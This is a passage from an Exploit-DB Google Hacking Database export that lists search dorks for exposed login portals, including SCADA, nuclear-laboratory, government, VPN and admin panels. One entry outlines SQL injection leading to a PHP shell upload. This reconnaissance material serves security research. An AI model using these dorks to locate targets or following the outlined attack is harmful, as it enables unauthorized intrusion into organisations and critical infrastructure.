<category>Pages Containing Login Portals</category>
<shortDescription>intitle:login laboratory | &quot;nuclear&quot; | physics &quot;password&quot; authentication</shortDescription>
<textualDescription>Login portals of specific interest
For other fields also try:
intitle:login institute of | national | center of | embassy | federation |
deputy &quot;password&quot;
intitle:login medicine | genetics | microbiology | cancer | neurologic
&quot;password&quot;
intitle:login democratic | nationalist | republican | socialist | federal
&quot;password&quot;
intitle:login aviatics | aviation | aeronautic | naval &quot;password&quot;
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:login laboratory | &quot;nuclear&quot; | physics &quot;password&quot; authentication</query>
<querystring>https://www.google.com/search?q=intitle:login laboratory | &quot;nuclear&quot; | physics &quot;password&quot; authentication</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4706</id>
<link>https://www.exploit-db.com/ghdb/4706</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Login to CMS Made Simple + inurl:/cmsms</shortDescription>
<textualDescription>intitle:Login to CMS Made Simple + inurl:/cmsms
CMS Made Simple login pages
ManhNho
</textualDescription>
<query>intitle:Login to CMS Made Simple + inurl:/cmsms</query>
<querystring>https://www.google.com/search?q=intitle:Login to CMS Made Simple + inurl:/cmsms</querystring>
<edb></edb>
<date>2018-03-21</date>
<author>ManhNho</author>
</entry>
<entry>
<id>4074</id>
<link>https://www.exploit-db.com/ghdb/4074</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Logon OrderCloud ui/logon.aspx</shortDescription>
<textualDescription>Four51 OrderCloud Company cloud software.
OrderCloud for shopping websites Login.
-Xploit </textualDescription>
<query>intitle:Logon OrderCloud ui/logon.aspx</query>
<querystring>https://www.google.com/search?q=intitle:Logon OrderCloud ui/logon.aspx</querystring>
<edb></edb>
<date>2015-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>7648</id>
<link>https://www.exploit-db.com/ghdb/7648</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:MailEnable inurl:&quot;/Login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intitle:MailEnable inurl:&quot;/Login.aspx&quot;
# Pages Containing Login Portals
# Date: 7/11/2021
# Exploit Author: Chinmay Divekar</textualDescription>
<query>intitle:MailEnable inurl:&quot;/Login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:MailEnable inurl:&quot;/Login.aspx&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Chinmay Divekar</author>
</entry>
<entry>
<id>5626</id>
<link>https://www.exploit-db.com/ghdb/5626</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Metabase inurl:/dash</shortDescription>
<textualDescription>Metabase Dashboard Queries
# Google Dork: intitle:Metabase inurl:/dash
# Date: [4-11-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:Metabase inurl:/dash</query>
<querystring>https://www.google.com/search?q=intitle:Metabase inurl:/dash</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>5660</id>
<link>https://www.exploit-db.com/ghdb/5660</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:MK-AUTH :: CONTEUDO RESTRITO -site:mk-auth.com.br</shortDescription>
<textualDescription>Dork for search any mkauth pages
</textualDescription>
<query>intitle:MK-AUTH :: CONTEUDO RESTRITO -site:mk-auth.com.br</query>
<querystring>https://www.google.com/search?q=intitle:MK-AUTH :: CONTEUDO RESTRITO -site:mk-auth.com.br</querystring>
<edb></edb>
<date>2019-12-02</date>
<author>sh4d0w</author>
</entry>
<entry>
<id>406</id>
<link>https://www.exploit-db.com/ghdb/406</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Node.List Win32.Version.3.11</shortDescription>
<textualDescription>synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess.</textualDescription>
<query>intitle:Node.List Win32.Version.3.11</query>
<querystring>https://www.google.com/search?q=intitle%3ANode.List+Win32.Version.3.11</querystring>
<edb></edb>
<date>2004-08-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>447</id>
<link>https://www.exploit-db.com/ghdb/447</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Novell intitle:WebAccess &quot;Copyright *-* Novell, Inc&quot;</shortDescription>
<textualDescription>search to show online Novell Groupwise web access portals.</textualDescription>
<query>intitle:Novell intitle:WebAccess &quot;Copyright *-* Novell, Inc&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Novell+WebAccess&amp;oe=UTF-8intitle:Novell intitle:WebAccess &quot;Copyright *-* Novell, Inc&quot;</querystring>
<edb></edb>
<date>2004-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5649</id>
<link>https://www.exploit-db.com/ghdb/5649</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:odoo inurl:login &quot;powered by odoo&quot; &quot;manage databases&quot;</shortDescription>
<textualDescription>intitle:odoo inurl:login &quot;powered by odoo&quot; &quot;manage databases&quot;
Dan Kritzinger</textualDescription>
<query>intitle:odoo inurl:login &quot;powered by odoo&quot; &quot;manage databases&quot;</query>
<querystring>https://www.google.com/search?q=intitle:odoo inurl:login &quot;powered by odoo&quot; &quot;manage databases&quot;</querystring>
<edb></edb>
<date>2019-11-20</date>
<author>Dan Kritzinger</author>
</entry>
<entry>
<id>5189</id>
<link>https://www.exploit-db.com/ghdb/5189</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:OmniDB intext:&quot;user. pwd. Sign in.&quot;</shortDescription>
<textualDescription>Login page of OmniDB database.
Author : Raj Kiran P
</textualDescription>
<query>intitle:OmniDB intext:&quot;user. pwd. Sign in.&quot;</query>
<querystring>https://www.google.com/search?q=intitle:OmniDB intext:&quot;user. pwd. Sign in.&quot;</querystring>
<edb></edb>
<date>2019-04-22</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>966</id>
<link>https://www.exploit-db.com/ghdb/966</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:open-xchange inurl:login.pl</shortDescription>
<textualDescription>Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities.</textualDescription>
<query>intitle:open-xchange inurl:login.pl</query>
<querystring>https://www.google.com/search?q=intitle:open-xchange+inurl:login.pl</querystring>
<edb></edb>
<date>2005-05-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>869</id>
<link>https://www.exploit-db.com/ghdb/869</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:opengroupware.org &quot;resistance is obsolete&quot; &quot;Report Bugs&quot; &quot;Username&quot; &quot;password&quot;</shortDescription>
<textualDescription>Open groupware is a comprehensive open source groupware project running on all major platforms.</textualDescription>
<query>intitle:opengroupware.org &quot;resistance is obsolete&quot; &quot;Report Bugs&quot; &quot;Username&quot; &quot;password&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Aopengroupware.org+%22resistance+is+obsolete%22+%22Report+Bugs%22+%22Username%22+%22password%22</querystring>
<edb></edb>
<date>2005-02-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4085</id>
<link>https://www.exploit-db.com/ghdb/4085</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Oracle PeopleSoft Sign-in &quot;Oracle&quot; Sign-in &quot;error&quot;</shortDescription>
<textualDescription>Oracle PeopleSoft Sign-in
Logins
-Xploit</textualDescription>
<query>intitle:Oracle PeopleSoft Sign-in &quot;Oracle&quot; Sign-in &quot;error&quot;</query>
<querystring>https://www.google.com/search?q=intitle:Oracle PeopleSoft Sign-in &quot;Oracle&quot; Sign-in &quot;error&quot;</querystring>
<edb></edb>
<date>2015-09-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1247</id>
<link>https://www.exploit-db.com/ghdb/1247</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Ovislink inurl:private/login</shortDescription>
<textualDescription>Ovislink vpn login page.</textualDescription>
<query>intitle:Ovislink inurl:private/login</query>
<querystring>https://www.google.com/search?q=intitle%3AOvislink+inurl%3Aprivate%2Flogin+&amp;sourceid=mozilla-search&amp;start=0&amp;start=0&amp;ie=utf-8&amp;oe=utf-8&amp;rls=org.mozilla:en-US:official</querystring>
<edb></edb>
<date>2006-01-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4090</id>
<link>https://www.exploit-db.com/ghdb/4090</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3</shortDescription>
<textualDescription>Login for Parallels Plesk Panel for Microsoft Windows
-Xploit</textualDescription>
<query>intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3</query>
<querystring>https://www.google.com/search?q=intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3</querystring>
<edb></edb>
<date>2015-10-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1062</id>
<link>https://www.exploit-db.com/ghdb/1062</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:phpnews.login</shortDescription>
<textualDescription>Vulnerable script auth.php (SQL injection)--- from rst.void.ru ---Possible scenario of attack:[1] log in admin panel, using SQL injection[2] upload PHP file through &quot;Upload Images&quot; function (index.php?action=images) and have fun with php shellor edit template (index.php?action=modtemp) and put backdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may be found sometimes in error messages.</textualDescription>
<query>intitle:phpnews.login</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=intitle%3Aphpnews.login+</querystring>
<edb></edb>
<date>2005-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5429</id>
<link>https://www.exploit-db.com/ghdb/5429</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:please login inurl:remote/login intext:FortiToken</shortDescription>
<textualDescription>Fortinet (FortiToken Mobile OTP auth application) login pages
# Google Dorks:
intitle:please login inurl:remote/login intext:FortiToken
intitle:please login inurl:remote/login intext:FortiClient
intext:Please Login SSL VPN inurl:remote/login intext:FortiClient
intext:Please Login SSL VPN inurl:remote/login intext:FortiToken
# Date: [21-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:please login inurl:remote/login intext:FortiToken</query>
<querystring>https://www.google.com/search?q=intitle:please login inurl:remote/login intext:FortiToken</querystring>
<edb></edb>
<date>2019-08-21</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>602</id>
<link>https://www.exploit-db.com/ghdb/602</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:plesk inurl:login.php3</shortDescription>
<textualDescription>Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus.</textualDescription>
<query>intitle:plesk inurl:login.php3</query>
<querystring>https://www.google.com/search?q=intitle%3Aplesk+inurl%3Alogin.php3</querystring>
<edb></edb>
<date>2004-10-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>5113</id>
<link>https://www.exploit-db.com/ghdb/5113</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:rms webportal</shortDescription>
<textualDescription>Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:rms webportal</query>
<querystring>https://www.google.com/search?q=intitle:rms webportal</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4324</id>
<link>https://www.exploit-db.com/ghdb/4324</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0</shortDescription>
<textualDescription>Description: Exposed Active Directory Federation Services (ADFS or AD FS) User Sign-in Pages
Google search: intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0
Dork Author: Serhii Pronin
</textualDescription>
<query>intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0</query>
<querystring>https://www.google.com/search?q=intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0</querystring>
<edb></edb>
<date>2016-09-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>5345</id>
<link>https://www.exploit-db.com/ghdb/5345</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:sign in inurl:/signin</shortDescription>
<textualDescription>login portal
intitle:sign in inurl:/signin
Reza Abasi(Turku)
</textualDescription>
<query>intitle:sign in inurl:/signin</query>
<querystring>https://www.google.com/search?q=intitle:sign in inurl:/signin</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5439</id>
<link>https://www.exploit-db.com/ghdb/5439</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:synology intext:&quot;Choose login account:&quot;</shortDescription>
<textualDescription>NAS Device login
# Google Dork: intitle:synology intext:&quot;Choose login account:&quot;
# Date: [22-08-2019]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:synology intext:&quot;Choose login account:&quot;</query>
<querystring>https://www.google.com/search?q=intitle:synology intext:&quot;Choose login account:&quot;</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>4704</id>
<link>https://www.exploit-db.com/ghdb/4704</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:tm4web login | logon | account | member | password</shortDescription>
<textualDescription>Login portals from web applications using the TM4J(Topic Maps 4 Java) topic
map engine.
Bruno Schmid</textualDescription>
<query>intitle:tm4web login | logon | account | member | password</query>
<querystring>https://www.google.com/search?q=intitle:tm4web login | logon | account | member | password</querystring>
<edb></edb>
<date>2018-03-20</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7517</id>
<link>https://www.exploit-db.com/ghdb/7517</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php</shortDescription>
<textualDescription># Google Dork: intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php
# Pages Containing Login Portals
# Date:28/10/2021
# Exploit Author: Naïm Gallouj</textualDescription>
<query>intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php</query>
<querystring>https://www.google.com/search?q=intitle:TYPO3 CMS Login: New TYPO3 site inurl:/typo3/index.php</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>Naïm Gallouj</author>
</entry>
<entry>
<id>5108</id>
<link>https://www.exploit-db.com/ghdb/5108</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:vendor | supply &amp; login | portal intext:login | email &amp; password</shortDescription>
<textualDescription>Login portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:vendor | supply &amp; login | portal intext:login | email &amp; password</query>
<querystring>https://www.google.com/search?q=intitle:vendor | supply &amp; login | portal intext:login | email &amp; password</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7442</id>
<link>https://www.exploit-db.com/ghdb/7442</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:vmware &quot;This is a restricted Access Server&quot;</shortDescription>
<textualDescription># Google Dork: intitle:vmware &quot;This is a restricted Access Server&quot;
# Pages Containing Login Portals
# Date:14/10/2021
# Exploit Author: César Hernández Obispo</textualDescription>
<query>intitle:vmware &quot;This is a restricted Access Server&quot;</query>
<querystring>https://www.google.com/search?q=intitle:vmware &quot;This is a restricted Access Server&quot;</querystring>
<edb></edb>
<date>2021-10-18</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>5738</id>
<link>https://www.exploit-db.com/ghdb/5738</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:VMware intext:&quot;VMware, Inc. All rights reserved.&quot; AND &quot;Powered by VMware Studio&quot;</shortDescription>
<textualDescription>AUTHOR: CANCOM #RedTeam
@ItsKarl0z
++ VMware Studio Login ++
intitle:VMware intext:&quot;VMware, Inc. All rights reserved.&quot; AND &quot;Powered by VMware Studio&quot;
intitle:vSphere intext:&quot;Powered by VMware Studio&quot;
</textualDescription>
<query>intitle:VMware intext:&quot;VMware, Inc. All rights reserved.&quot; AND &quot;Powered by VMware Studio&quot;</query>
<querystring>https://www.google.com/search?q=intitle:VMware intext:&quot;VMware, Inc. All rights reserved.&quot; AND &quot;Powered by VMware Studio&quot;</querystring>
<edb></edb>
<date>2020-02-18</date>
<author>CANCOM #RedTeam</author>
</entry>
<entry>
<id>5730</id>
<link>https://www.exploit-db.com/ghdb/5730</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:VMware inurl:5480</shortDescription>
<textualDescription>VMware Appliance Management Logins
# Google Dork: intitle:VMware inurl:5480
# Date: [6-2-2020]
# Author: [Mohammed*_*]
</textualDescription>
<query>intitle:VMware inurl:5480</query>
<querystring>https://www.google.com/search?q=intitle:VMware inurl:5480</querystring>
<edb></edb>
<date>2020-02-10</date>
<author>Mohammed*_*</author>
</entry>
<entry>
<id>4243</id>
<link>https://www.exploit-db.com/ghdb/4243</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:vood act=index Gateway &gt;Login</shortDescription>
<textualDescription>More VOOD Online Gateway Logins
inurl:/vood/cgi-bin/vood_view.cgi?act=index
-Xploit </textualDescription>
<query>intitle:vood act=index Gateway &gt;Login</query>
<querystring>https://www.google.com/search?q=intitle:vood act=index Gateway &gt;Login</querystring>
<edb></edb>
<date>2016-03-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>4859</id>
<link>https://www.exploit-db.com/ghdb/4859</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:Wagtail.-.Sign in intext:Javascript.is.required.to.use.Wagtail</shortDescription>
<textualDescription>Retrieve all admin page of website that use Wagtail CMS.
More: inurl:admin intitle:wagtail -wagtail.io -stackoverflow -github
Author: Raj Kiran P
</textualDescription>
<query>intitle:Wagtail.-.Sign in intext:Javascript.is.required.to.use.Wagtail</query>
<querystring>https://www.google.com/search?q=intitle:Wagtail.-.Sign in intext:Javascript.is.required.to.use.Wagtail</querystring>
<edb></edb>
<date>2018-06-18</date>
<author>Raj Kiran P</author>
</entry>
<entry>
<id>4721</id>
<link>https://www.exploit-db.com/ghdb/4721</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:your access id is&quot; login -youtube</shortDescription>
<textualDescription>Login portals and sometimes instructions how to get or reset user access IDs
Bruno Schmid
</textualDescription>
<query>intitle:your access id is&quot; login -youtube</query>
<querystring>https://www.google.com/search?q=intitle:your access id is&quot; login -youtube</querystring>
<edb></edb>
<date>2018-03-30</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7960</id>
<link>https://www.exploit-db.com/ghdb/7960</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle:[TM4Web] inurl:login.msw</shortDescription>
<textualDescription># Google Dork: intitle:[TM4Web] inurl:login.msw
# Pages Containing Login Portals
# Date:01/07/2022
# Exploit Author: Lutzenfried</textualDescription>
<query>intitle:[TM4Web] inurl:login.msw</query>
<querystring>https://www.google.com/search?q=intitle:[TM4Web] inurl:login.msw</querystring>
<edb></edb>
<date>2022-07-01</date>
<author>Lutzenfried</author>
</entry>
<entry>
<id>7262</id>
<link>https://www.exploit-db.com/ghdb/7262</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle|inurl:&quot;SCADA login&quot;</shortDescription>
<textualDescription># Google Dork: intitle|inurl:&quot;SCADA login&quot;
# Pages Containing Login Portals
# Date:16/09/2021
# Exploit Author: Cyber Shelby</textualDescription>
<query>intitle|inurl:&quot;SCADA login&quot;</query>
<querystring>https://www.google.com/search?q=intitle|inurl:&quot;SCADA login&quot;</querystring>
<edb></edb>
<date>2021-09-20</date>
<author>Cyber Shelby</author>
</entry>
<entry>
<id>7277</id>
<link>https://www.exploit-db.com/ghdb/7277</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intitle|inurl::&quot;IoT login&quot;</shortDescription>
<textualDescription># Google Dork: intitle|inurl::&quot;IoT login&quot;
# Pages Containing Login Portals
# Date:23/09/2021
# Exploit Author: Yash Singh
</textualDescription>
<query>intitle|inurl::&quot;IoT login&quot;</query>
<querystring>https://www.google.com/search?q=intitle|inurl::&quot;IoT login&quot;</querystring>
<edb></edb>
<date>2021-09-22</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>4983</id>
<link>https://www.exploit-db.com/ghdb/4983</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inur:&quot;arsys/forms&quot; | &quot;arsys/shared&quot; | &quot;/arsys/home&quot;</shortDescription>
<textualDescription>BMC remedy AR System Server portals
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inur:&quot;arsys/forms&quot; | &quot;arsys/shared&quot; | &quot;/arsys/home&quot;</query>
<querystring>https://www.google.com/search?q=inur:&quot;arsys/forms&quot; | &quot;arsys/shared&quot; | &quot;/arsys/home&quot;</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7149</id>
<link>https://www.exploit-db.com/ghdb/7149</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl &quot;/admin/index.php&quot; username=admin&amp;password=password</shortDescription>
<textualDescription># Google Dork: inurl &quot;/admin/index.php&quot; username=admin&amp;password=password
# Pages Containing Login Portals
# Date: 31/08/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>inurl &quot;/admin/index.php&quot; username=admin&amp;password=password</query>
<querystring>https://www.google.com/search?q=inurl &quot;/admin/index.php&quot; username=admin&amp;password=password</querystring>
<edb></edb>
<date>2021-09-02</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7806</id>
<link>https://www.exploit-db.com/ghdb/7806</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl *:8443/login.jsp</shortDescription>
<textualDescription># Google Dork: inurl *:8443/login.jsp
# Pages Containing Login Portals
# Date:15/11/2021
# Exploit Author: Vivek Pancholi</textualDescription>
<query>inurl *:8443/login.jsp</query>
<querystring>https://www.google.com/search?q=inurl *:8443/login.jsp</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Vivek Pancholi</author>
</entry>
<entry>
<id>7183</id>
<link>https://www.exploit-db.com/ghdb/7183</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl /admin/login intitle panel admin site:&quot;*.in&quot;</shortDescription>
<textualDescription># Google Dork: inurl /admin/login intitle panel admin site:&quot;*.in&quot;
# Pages Containing Login Portals
# Date: 06/09/2021
# Exploit Author: Sarthi Shinde</textualDescription>
<query>inurl /admin/login intitle panel admin site:&quot;*.in&quot;</query>
<querystring>https://www.google.com/search?q=inurl /admin/login intitle panel admin site:&quot;*.in&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>sarthi shinde</author>
</entry>
<entry>
<id>7153</id>
<link>https://www.exploit-db.com/ghdb/7153</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl /admin/login.php intitle panel admin</shortDescription>
<textualDescription># Google Dork: inurl /admin/login.php intitle panel admin
# Pages Containing Login Portals
# Date: 31/08/2021
# Exploit Author: Sahil Gupta</textualDescription>
<query>inurl /admin/login.php intitle panel admin</query>
<querystring>https://www.google.com/search?q=inurl /admin/login.php intitle panel admin</querystring>
<edb></edb>
<date>2021-09-06</date>
<author>Sahil Gupta</author>
</entry>
<entry>
<id>7791</id>
<link>https://www.exploit-db.com/ghdb/7791</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl admin login php gov.in</shortDescription>
<textualDescription># Google Dork: inurl admin login php gov.in
# Pages Containing Login Portals
# Date: 14/11/2021
# Exploit Author: Arindam Saha</textualDescription>
<query>inurl admin login php gov.in</query>
<querystring>https://www.google.com/search?q=inurl admin login php gov.in</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Arindam Saha</author>
</entry>
<entry>
<id>8168</id>
<link>https://www.exploit-db.com/ghdb/8168</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;
# Pages Containing Login Portals
# Date:20/04/2023
# Exploit Author: Bhavin Amesara</textualDescription>
<query>inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;/admin&quot; intitle:&quot;Admin Login&quot;</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>Bhavin Amesara</author>
</entry>
<entry>
<id>7387</id>
<link>https://www.exploit-db.com/ghdb/7387</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: &quot;admin-login.php&quot;</shortDescription>
<textualDescription># Google Dork: inurl: &quot;admin-login.php&quot;
# Pages Containing Login Portals
# Date:04/10/2021
# Exploit Author: Zeshan Ahmad</textualDescription>
<query>inurl: &quot;admin-login.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl: &quot;admin-login.php&quot;</querystring>
<edb></edb>
<date>2021-10-05</date>
<author>Zeshan Ahmad</author>
</entry>
<entry>
<id>7363</id>
<link>https://www.exploit-db.com/ghdb/7363</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: /admin/login.php intitle: panel admin</shortDescription>
<textualDescription># Google Dork: inurl: /admin/login.php intitle: panel admin
# Pages Containing Login Portals
# Date:01/10/2021
# Exploit Author: Bhavin Amesara</textualDescription>
<query>inurl: /admin/login.php intitle: panel admin</query>
<querystring>https://www.google.com/search?q=inurl: /admin/login.php intitle: panel admin</querystring>
<edb></edb>
<date>2021-10-01</date>
<author>Bhavin Amesara</author>
</entry>
<entry>
<id>5318</id>
<link>https://www.exploit-db.com/ghdb/5318</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: admin/login.aspx</shortDescription>
<textualDescription>Google Dork: inurl: admin/login.aspx
Date: 08/02/2019
Author: Adrian Roy Lorica
</textualDescription>
<query>inurl: admin/login.aspx</query>
<querystring>https://www.google.com/search?q=inurl: admin/login.aspx</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Adrian Roy Lorica</author>
</entry>
<entry>
<id>6521</id>
<link>https://www.exploit-db.com/ghdb/6521</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: authorlogin.php</shortDescription>
<textualDescription> #Exploit Title: Pages containing login portals.
#Google Dork: inurl: authorlogin.php
#Date: 07/09/2020
#Exploit Author: Sanu Jose M
Thanks &amp; regards,
SANU JOSE M
</textualDescription>
<query>inurl: authorlogin.php</query>
<querystring>https://www.google.com/search?q=inurl: authorlogin.php</querystring>
<edb></edb>
<date>2020-09-07</date>
<author>Sanu Jose M</author>
</entry>
<entry>
<id>7278</id>
<link>https://www.exploit-db.com/ghdb/7278</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl: login.http</shortDescription>
<textualDescription># Google Dork: inurl: login.http
# Pages Containing Login Portals
# Date:23/09/2021
# Exploit Author: Poulami Kayal</textualDescription>
<query>inurl: login.http</query>
<querystring>https://www.google.com/search?q=inurl: login.http</querystring>
<edb></edb>
<date>2021-09-22</date>
<author>Poulami Kayal</author>
</entry>
<entry>
<id>7824</id>
<link>https://www.exploit-db.com/ghdb/7824</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;*admin | login&quot; | inurl:.php | .asp</shortDescription>
<textualDescription># Google Dork: inurl:&quot;*admin | login&quot; | inurl:.php | .asp
# Pages Containing Login Portals
# Date: 17/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:&quot;*admin | login&quot; | inurl:.php | .asp</query>
<querystring>https://www.google.com/search?q=inurl:&quot;*admin | login&quot; | inurl:.php | .asp</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>7882</id>
<link>https://www.exploit-db.com/ghdb/7882</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;*admin|login&quot; site: gov</shortDescription>
<textualDescription># Google Dork: inurl:&quot;*admin|login&quot; site: gov
# Files Containing Juicy Info
# Date: 09/12/2021
# Exploit Author: Raghava Raju
</textualDescription>
<query>inurl:&quot;*admin|login&quot; site: gov</query>
<querystring>https://www.google.com/search?q=inurl:&quot;*admin|login&quot; site: gov</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Raghava Raju</author>
</entry>
<entry>
<id>4404</id>
<link>https://www.exploit-db.com/ghdb/4404</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;</shortDescription>
<textualDescription>Admin Logins
-Xploit </textualDescription>
<query>inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;</querystring>
<edb></edb>
<date>2017-03-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>6260</id>
<link>https://www.exploit-db.com/ghdb/6260</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;</shortDescription>
<textualDescription>Google Dork : inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;
Author : ANJALI PRAKASH
</textualDescription>
<query>inurl:&quot;.Admin;-aspx }&quot; &quot;~Login&quot;</query>
